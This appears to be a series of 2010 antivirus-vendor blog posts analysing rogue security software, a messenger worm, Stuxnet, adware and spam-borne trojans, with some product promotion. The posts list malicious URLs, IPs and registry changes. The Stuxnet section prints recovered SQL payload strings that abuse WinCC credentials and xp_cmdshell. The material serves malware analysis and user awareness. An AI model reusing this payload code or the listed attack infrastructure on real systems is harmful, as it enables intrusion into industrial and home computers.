Rogue Security products are constantly submitted to us by our customers and researchers for analysis, and carrying on our little analysis report of something interesting we come across while doing those analyses. This week our research lab got to meet a rogue product faking itself to be Microsoft’s security product, Microsoft Security Essentials. Let us see what we found.

Every rogue variant tries to do something different to fool end users or make job of virus researchers a bit harder. When we started analyzing this variant, we saw that when this rogue is active in a victim’s system, the malware will monitor every process. At the instance when an application is executed the rogue will terminate the process responsible.

And then shows the following fake alert

The rogue has a hard coded list executables which will be blocked.

With the Alert prompt on the face, if the user clicks “Clean Computer” or “Apply actions”, the application says “Unable to remove the threat”.

Running out of options, the user moves on to “Scan Online”, when he is redirected to the address below

-          http://abcd799d2aae82bad9effd7a716d2.co.cc/pipec/new.php?id=allinone

And displays the screen

The images including the antivirus logos navigate to

-          http://64.27.0.236/images/pb.gif

-          http://64.27.0.236/images/pca.png

-          http://64.27.0.236/images/pb.gif

-          http://64.27.0.236/images/NOD32.gif

-          http://64.27.0.236/images/IKARUS.gif

-          http://64.27.0.236/images/VirusBuster.gif

-          http://64.27.0.236/images/VirusBuster.gif

which ofcourse when the aforesaid IP is visited, we are presented the website below

The social engineering attempts by these malware authors are never-ending but as always have more than one loophole. And if we give a close look at the Alert window with multiple AV vendor recommendations, we will see all “legitimate” vendors have scan result as “nothing” and removal tool button is disabled. The ones with enabled links are Red Cross, Peak Protection, Pest Detector, Major Defense Kit and AntiSpySafeguard. Let’s look into some of these.

Red Cross

When an user chooses and clicks Red Cross enabled removal tool, the user is navigated to http://abcd799d2aae82bad9effd7a716d2.co.cc/pipec/setup_rca.exe and the rogue variant is downloaded.

During the installation process, the rogue connects to the address http://abcd799d2aae82bad9effd7a716d2.co.cc /inst.php?id=hiro01

The system restarts after the installation, and the user is presented a desktop with a screen like below but no start button, taskbar nor desktop icons.

We found out the rogue had changed the shell from explorer.exe to the malware executable.

Fake Alerts do continue

We did further analysis on Peak Protection 2010, Pest Detector, Major Defense Kit and AntiSpySafeguard which showed similar behaviors of Desktop background screen and fake warnings. Some screenshots of such behaviors are given below for further awareness.

We blogged about Antivirus2010 and tried to find out a little more than what normal analysis could have done. Our series of exposing latest rogue security product variants continue this week with another of its kind, Security Suite.

Back in 2008 with AntivirusXP and then with few others, a trend started in rogues which were creation of randomly named executables as main malicious binary and also in similar randomly named folders. Security Suite carries on the trend, dropping the rogue application under %userprofile%\Local Settings\Application Data\%random%\%random%.exe.
Fake alerts have always accompanied rogue security products, and few instances of such in this variant are below.

Digging deep into the rogue product, we see that as most recent variants, this one is also packed and encrypted to protect itself from further analysis and make an attempt to make the job analysts harder. The decryption routine for the same

Security Suite marks its presence in the infected system with a unique mutex named “MSFT.Notepad”, another continuous attempt to confuse end users. The malware also disables execution of most applications barring few with following executable names.

• Iexplore.exe
• Opera.exe
• Firefox.exe
• Avsoft.exe
• Avsuite.exe
• Asdef.exe
• Avsolution.exe
• Ssuite.exe
• Setup
• Syssvc.exe
• Getfile
• Consent.exe
• Dllhost.exe

We also saw instances of remote connection attempt by the rogue product to the following malicious urls
• hxxp://antivirone.com/percer.php?login=NjguOTQ3
• hxxp://antivirone.com/check?pgid=5

We did some domain specific research and ofcourse the domain was created as recently as

Name: Kese Done
Organization: Done inc
Address: Lee st 66
City: AL
Province/state: AL
Country: US
Postal Code: 36022
Phone: +1.9957737722
Fax: +1.9957737722
Email: admin@antivirstrong.com

Nameserver Information:
ns1.antivirone.com
ns2.antivirone.com

Create: 2010-08-11 17:05:19
Update: 2010-08-11
Expired: 2011-08-11

Nothing really stands out. We then visited the mentioned “websites” antivirone.com and antivirstrong.com, which are not surprisingly completely similar. Malware authors are always trying to bring out new different ways to fool end users, and when one visits accidental redirections or popups, the “polished” look will surely confuse him. But that is why we are constantly carrying on our attempts to educate and make users aware.

Lets have a look here, http://antivirone.com/aboutus and the first thing we notice is, “Founded in 2000, the company’s mission is to bring security, productivity and privacy to the Internet.” And then this, “Our products and services are used by millions of people, with registered customers in over 150 countries. Our products are actively used by individual users, small businesses, non-profit and community organizations, educational institutions, government agencies, right through to a number of the worlds leading Fortune 500 companies.”     Interesting, but did we just see the domain itself being registered on 11th August 2010!

We carried on our reverse analysis simultaneously, and discovered that the malware will also try to open adult content related websites on the victim’s computer as time passes by

• www.viagra.com
• www.porno.org
• www.porno.com
• www.adult.com

We are as always ahead of these rogue products, and Emsisoft AntiMalware detects this threat as Trojan.Win32.FakeSpypro!IK or Adware.Win32.SecuritySuite!A2.

Detailed Report – http://www.virustotal.com/file-scan/report.html?id=9ef86655b73e16648f9ac9d079ea0c76fce26ee34a0073ea4d3a38fdbb17d948-1282330189

Detailed Report : http://www.virustotal.com/file-scan/report.html?id=622ee856d56f127324d245b23f10b893e964c4e8e7175d61ebe9d5f742ed7a4b-1282330202

We are excited to announce an awesome opportunity to try out Emsisoft AntiMalware and Sandboxie together.

Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.

Sandboxie is an awesome product and complements Emsisoft AntiMalware very well. We have negotiated a very special offer with the makers of Sandboxie and the details are as follows,

Sandboxie for US $10! Limited offer – only 100 units available!

Single PC - 1 Year:

US $50.-

Emsisoft Anti-Malware have remained steps ahead of malware authors and we make sure we are keeping our customers confident and safe while using their system. We are very proud to state that we have been awarded the prestigious VB100 award this month. Those who are not aware, from Virus Bulletin’s website, http://www.virusbtn.com/vb100/index

In order to display the VB100 logo, an anti-virus product must have demonstrated in our tests that:

• It detects all In the Wild viruses during both on-demand and on-access scanning.
• It generates no false positives when scanning a set of clean files.

The product must fulfil these criteria in its default state.

This award is a proof of our continous dedication in making Emsisoft Anti-Malware the best antimalware product out there. A huge thank you goes out specially to our users and customers for their continuing faith on us.

There is a new rogue variant making rounds going by the name Antivirus2010. The malware copies itself to the System32 directory with a name similar to commonly used Windows file present in same directory.

If looked through naked eye, there seems to exist two userinit.exe though one has a unique icon and the other doesn’t. We traversed through the System32 directory in command prompt and the non-english character in the malicious userinit.exe came out quite easily.

The malware registers itself as a service to start automatically with Windows.

On execution, the malware extracts and builds PE file on memory with the name lz32.dll, and makes a remote connection to download another dll component.

Remote address connections established are

• 213.174.130.36:8082/ask?t=1&u=5&a=0&m=aa26135f&h=b4e6aeff&s=0&p=0
• 213.174.130.39
• 213.174.130.39:80/update.db
• http://213.174.130.32/verify.js?key=
• http://213.174.130.39/uninstall.js
• https://secure.avsbilling.com/order/get.php?i=antvir&advert=
• https://secure.avsbilling.com/order/activate.php?orderid=

Downloaded malicious DLL is dropped under the System32 directory. The DLL is normally an eight lettered randomly named file, for example mswmqnei.dll or mspnxdcm.dll and is encrypted. The DLL is loaded into the memory to display the main UI of the rogue security product. The UI was created using HTML/Javascript, which as we can see, the malware stores the UI in the resource area of the DLL.

Analysing the HTML file, in the INSTALL.HTML we can notice a url which is currently inactive. Incidentally the IP in the url is the same one that the malware uses to download malicious file.

The front end of the IP if visited presents a website with adult content.

Looking the registry modification we found some more informations about the rogue product and we decided to do some more research.

A simple dns information on hxxp://www.webtopbilling.com revealed

Domain Name: WEBTOPBILLING.COM

Registrant:

N/A

Nick Besmark        (avbill@ua.fm)

P.O. Box 2494

Victoria

Mahe,00000

SC

Tel. +7.9263901779

Creation Date: 04-May-2010

Expiration Date: 04-May-2011

Domain servers in listed order:

ns2.unitedplatform.com

ns1.unitedplatform.com

Not specifically suspicious about an website registered by someone residing in Mahe, Seychelles and which currently gives a 403 Forbidden message. We then looked at unitedplatform.com and the first thing we noticed about it is that we actually land at domaincontext.com which is a domain registrar website.

But we didn’t want to leave unitedplatform.com yet, and we stumbled upon http://www.malwareurl.com/ns_listing.php?ns=ns2.unitedplatform.com. The malware domains listed there shows more than one instance of malicious activity and maybe coincidence again that all are recently created domains. There maybe a distant connection we can assume, which proves again the inter-relationship between various rogue security products and exploits in the web. It is more than a billion dollar industry out there, but we are always more than a step ahead from them.

In between email spams, twitter, facebook let us not forget one of the most prevalent medium a malware can spread around. Messengers have always been a popular medium for malware propagation and we at Emsisoft Labs recently came across worm like behavior attempting to spread through Yahoo! Messenger.

The initial picture is not too unfamiliar to someone using Messenger, with the popup of a random message window “Is this you on pic? Hxxp://hyperlink.

If the victim clicks the hyperlink, the default browser opens and download file prompt appears.  We found out the following few common executable download links

• PI6-JPG-www.facebook.com.exe
• PIC007-JPG-www.facebook.com.exe
• PIC67576-JPG-www.facebook.com.exe
• PIC676-JPG-www.facebook.com.exe
• PIC6781-JPG-www.facebook.com.exe
• IMG0018.exe

Analysing further we see the parent urls as below

• hxxp://75.102.36.231/*****45336-JPG-www.facebook.com.exe
• hxxp://migre.me/*****?=www.facebook.com/photo.php?=
• hxxp://66.49.214.28/~av***/IMG0018.exe
• hxxp://66.49.214.28/~av***/PI6-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC007-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC67576-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC676-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC6781-JPG-www.facebook.com.exe

On execution of the malicious file, it opens browser to http://browseusers.myspace.com/Browse/Browse.aspx which disguises itself running its own malicious activities in the background.

We did some initial research, and based on some loose strings from the worm we tried to find out the payload. The worm searches Yahoo! Messenger application by searching window class named “YahooBuddyMain”, and then emulates keyboard events to send fake messages to all Yahoo! Messenger contacts.

Incidentally the worm also tries to spread itself through IRC, below being an IRC log traffic event

The malware also monitors the keyboard strokes using GetKeyState and GetAsyncKeyState API, adding a possible keylogger activity.

There have been quite a few security incident related to usb/flash drives and autorun behaviors. Since thee usage and portability of such vectors are advantageous to users, it was just a matter of time to be exploited by malware authors.

A new threat, recently discovered, is getting some attention and we at Emsisoft wanted to make sure users are aware of the same and also know more than just what it is. The threat is detected by Emsisoft Anti-Malware as Stuxnet, and also goes by TmpHider detected by some other vendors.

The malware has a quite few detections already and as reported by VirusBlokAda, the propagation of the malware makes it different than already prevalent drive and autorun based variants.Stuxnet spread through flash drive, does not require user interaction at all unlike other malwares which uses autorun feature from the same drives. The malware uses created .LNK files to carry on its execution. Emsisoft Anti-Malware detects the exploit .LNK file as Exploit.LNK.CVE-2010-2568.

The following files have been seen to be present in an infected flash disk

• ~WTR4132.tmp
• ~WTR4141.tmp
• Copy of Shortcut to .lnk
• Copy of Copy of Shortcut to .lnk
• Copy of Copy of Copy of Shortcut to .lnk
• Copy of Copy of Copy of Copy of Shortcut to .lnk

Once the user opens the flash drive in Windows Explorer, and Explorer displays the icon of the shortcut, the malware automatically run the malicious files, namely the .TMP files. The consecutive incidents happen without any user interaction or intervention.

Let us dig deep into the malicious events and binaries. ~wtr4141.tmp and ~wtr4132.tmp files are actually DLLs which get loaded into the memory. The malware then extracts two .SYS files named mrxcls.sys and mrxnet.sys, which are kernel drivers responsible for hooking and hide the related malicious files. Thus, soon after execution of the malware, the files do not remain visible to naked eye.Also interestingly, if we check the properties of the .SYS files they are “digitally signed” with “Realtek Semiconductor Corp.”.

The kernel drivers get installed without any notification from Windows as Windows thinks the files are trusted based on digital signatures. Verisign as of now has revoked the said certificates and also taken necessary steps to make sure the malware won’t be able to run smoothly with fake certificate.

Microsoft has explained that they are still investifating and working on an update to address this vulnerability (CVE-2010-2568). The report does mention that even completely patched Windows 7 32 bit or 64 bit is affected by this vulnerability. The following is the complete list of affected versions of Windows system.

Stuxnet goes on to inject malicious files into the processes services.exe and svchost.exe. On infected processes one can see the module named KERNEL32.DLL.ASLR.XXXXXX. The malware creates the following in an infected machine.

• %windir%\system32\drivers\mrxcls.sys
• %windir%\system32\drivers\mrxnet.sys
• %windir%\inf\oem6C.PNF
• %windir%\inf\oem7A.PNF
• %windir%\inf\mdmcpq3.PNF
• windir%\inf\mdmeric3.PNF

Analysis done in our lab revealed lots of interesting strings

s7hkimdb.dll

S7EPATDX.CPL

ApiLog\Types

SOFTWARE\Microsoft\MSSQLServer

WinCCConnect

.\WinCC

sqloledb

GracS\cc_tlg7.sav

Step7\Example

use [%s]

declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7)  end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';ex

declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o     where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid  set @e=charindex('--CC-SP',@t)  if @e=0  begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6)  end else  select * from fail_in_order_to_return_false  set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(s

The mentioned strings are assumed to belong to SIMATIC WinCC and SIMATIC Siemens STEP 7, which are popular softwares used in industrial processes. The malware is supposedly aimed at attacking such systems. Another interesting fact is that countries most widely affected by this malware are Iran, Indonesia and India.

• Image courtesy Microsoft Threat Research and Response Blog

Microsoft has released a workaround until a patch is released which can be found here http://support.microsoft.com/kb/2286198#FixItForMe. Do update your respective antivirus system and make sure to scan any external device before using it. We at Emsisoft are constantly working hard to remain ahead as we will always be.

Craigslist is one of the most popularly visited website, and malware authors are always on the lookout for such vectors for their own interest. A message like below have been circulating around in craigslist

I just want to make sure i am going to buy the same which i am looking for.
I can’t afford another mistake as i did in the past.
Please check the video and confirm that it’s the same u have.

PLAY VIDEO

If it’s the same one I will be there today to buy it

Thanks

Few have already fallen for this and one such shows.

The video url points to
• http://fav-vid.net/playvideo.php?video=jgahnYYNPe0
• http://watch-stuff.us/playvideo.php?video=jgahnYYNPe3
The contents when analysed exposes

which redirects users to the following hyperlink hxxp://favvids.net/playvideo.php?video=jgahnYYNPe0&feature=youtube_gdata&name=my_stuff

The website when visited plays an old trick. The video is shown as not loaded and an additional action has to be taken to see the video.

The confused end user goes on to install the malicious file thus falling into the malware author’s trap.

The following code executes the action and when user goes on to press “Play”

the download request comes for FLVDirect player, if user agrees redirected to flvpro.com.

The privacy page clearly mentions the collected information such as IP address, computer settings etc. The other interesting information is the number of downloads for the specific file, which is more than 2 million thus playing as a confidence booster. Let’s go a bit deep and we see the following

The script makes the download count to start from 2358754 and continues to grow with every second. Another trick to fool users. The scan reports for the same is shown below.

We at Emsisoft make sure to remain a step ahead always, detecting the specific malware as Riskware.WebToolbar.Win32.ChameleonTom!IK.
Further analysis on the malware was done. When executed this adware, the following installation screen appears.

The user goes on to “Accept and Install” and the program goes on to change browser settings without user knowledge, and default homepage changes to hxxp://flvdirect.iamwired.net

The following remote website connections were established while installation
• download.flvmeganetwork.biz/FLVPlayer_silent.exe

• submit.flvmeganetwork.biz/usr/getgeoipinfo.php?gup=XnqtpZBVQQk=&u={AB4BB94A-733E-4B06-96A9-91C327FB0976}

• flvmeganetwork.biz/smb/fknst.php?v=1&p=oQ9M8bwrbWN7oktDK0105%2BSIZy%2FRfnOOWdfskwm4fggJrfJePi8zqEP%2Beq7a0FziayoOdCG1c54%3D

•flvdirect.com

Once user goes on to fill up informations as shown, popups start appearing

The browser when opened , the following homepage starts as default with a new shortcut at desktop.

When the application is run , the player opens as below.

The Register has also reported about the specific adware and can also be installed through mishandling in facebook. Make sure to keep Emsisoft AntiMalware updated and be safe.

We have been continuously stressing on the importance of malicious attacks through social networks and social engineering methods. Social Carriers like Facebook, Twitter and Social Engineering catalysts like Internet browsers are under constant threat and malware authors are always trying their part to create different kinds of attacks through these vectors.

Recent spam related distributions related to Internal Revenue Service (IRS) spreading around through following urls
hxxp://www.irs.gov.psxxx.ru/fraud_application/directory/statement.php, hxxp://www.irs.gov.pxxx.ru/fraud_application/directory/statement.php, hxxp://www.irs.gov.msxxx.ru/fraud_application/directory
/statement.php, where the url tries to confuse end users with irs.gov in the middle of the extended url. Similar urls like
hxxp://supertototorama.eu/resume.html
hxxp://www.hrmsconsulting.com/info.html
hxxp://caaz.org/irs_form_2009_i1040tt.html

also adds fuel to fire.

Tracing and analyzing one of these url, (http://www.hrmsconxxxxxxx.com/info.html), we found out that there is an underlying exploit,

Where “\x69\x6E\x66\x6F\x2E\x65\x78\x65″ is a hexadecimal string decoding to “info.exe”, the said file will be downloaded as following hyperlink hxxp://www.hrmsconxxxxxxx.com/info.exe .

Emsisoft Antimalware (EAM) detects the malware as Trojan-Downloader.Delphi! IK

Once executed , the malicious binary goes on to download a PDF from

http://static.googleusercontent.com/external_content/untrusted_dlcp/www.google.com/en//adwords/insider/Insiders_Guide_to_AdWords.pdf and attemps to download another file : hxxp://www.hrmsconsuxxxxx.com/ie.jpg, and drops itself as AcroIEHelper.dll under

C:\Windows\inf\AcroIEHelper.dll

Which is of approximately 658 KB , and a Delphi binary.

Digging deeper, we found out that the the Info.exe registers AcroIEHelper.dll as a Browser Helper Object

-          HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

-          HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}\InprocServer32
(SZ) (Default) = C:\WINDOWS\inf\AcroIEHelper.dll
(SZ) ThreadingModel = Apartment

-          HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

-          HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}

-          HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FCADDC14-BD46-408A-9842-CDBE1C6D37EB}\iexplore

With the execution of the malware, Internet Explorer is injected with the Browser Modifier.

Finally the AcroIEHelper.dll file attemps to connect to http://91.216.xxx.xx/ebb.php which we can see while analyzing the file

The victim’s computer thus becomes an open book, ready to be exploited or waiting to be taken over for more malicious activities. We at Emsisoft are constantly working hard to make sure our customers are protected and remains safe, so please make sure you update your Windows version and always update Emsisoft Antimalware.

How many times have you been infected while browsing, or to ask a simpler question how many times you have actually thought that your browser may be the root cause of many a security problems you have in your system?

The malware authors are always on the look out to find the easiest way to get into your system, and with the increased importance of security in most platforms, browsers are one of the hottest targets. And there are plug-ins.

According to this report, http://www.theregister.co.uk/2010/03/09/adobe_reader_attacks/ , files based on Adobe Reader were exploited in almost 49 per cent of targeted attacks of 2009! And that’s just one of such scary news. Plug-ins like Flash or even Java, are under constant attack themselves and we see frequent updates of those.

Google announced some initiatives from their side about their own browser, Chrome and what they are doing to tackle such threats. More can be read here – http://blog.chromium.org/2010/06/improving-plug-in-security.html

The most important of all of these initiatives is the Warning before running infrequently used plug-ins. That will keep most user on their toes about what they have been using and if needed they can uninstall/deactivate those they don’t use much. This helps in minimizing number of problems right at the root and users can always be sure of what they are using in their own system.